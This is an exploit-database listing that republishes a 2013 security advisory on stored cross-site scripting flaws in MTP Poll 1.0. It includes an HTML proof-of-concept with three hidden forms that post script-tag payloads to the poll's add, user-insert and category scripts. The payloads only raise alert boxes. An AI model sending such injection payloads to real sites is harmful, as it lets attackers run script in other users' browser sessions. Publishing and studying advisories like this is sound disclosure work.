[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MTP Poll 1.0 - Multiple XSS Vulnerabilities

Author
LiquidWorm
Risk
[
Security Risk High
]
0day-ID
0day-ID-20441
Category
web applications
Date add
26-02-2013
Platform
php
<!--
 
MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities
 
 
Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0
 
Summary: More than poll is a polling system with a powerful
administration tool. It features: multiple pools, templates,
unlimited options, IP Logging, cookie support, and more.
 
Desc: MTP Poll script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.
 
Tested on: Linux, Apache2
 
 
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
 
 
Advisory ID: ZSL-2013-5132
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5132.php
 
 
17.02.2013
 
-->
 
<html>
<head>
<title>MTP Poll 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form method="POST" action="http://localhost/poll_script/poll_add.php">
<input type="hidden" name="question" value='"><script>alert(1);</script>' />
<input type="hidden" name="color[]" value="#8bc6e1" />
<input type="hidden" name="answer[]" value='"><script>alert(2);</script>' />
<input type="hidden" name="img[]" value="" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="cat" value="0" />
<input type="hidden" name="action" value="add" />
<input type="submit" value="XSS #1" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/insert_user.php">
<input type="hidden" name="ins_city" value='"><script>alert(3);</script>' />
<input type="hidden" name="ins_country" value="MK" />
<input type="hidden" name="ins_email" value="lab@zeroscience.mk" />
<input type="hidden" name="ins_fname" value='"><script>alert(4);</script>' />
<input type="hidden" name="ins_pass" value="thricerpass" />
<input type="hidden" name="ins_username" value="thricer" />
<input type="submit" value="XSS #2" />
</form>
<br /><br />
<form method="POST" action="http://localhost/poll_script/ajax_cat_ins.php">
<input type="hidden" name="name" value='"><script>alert(5);</script>' />
<input type="submit" value="XSS #3" />
</form>
</center></body>
</html>

#  0day.today [2024-12-25]  #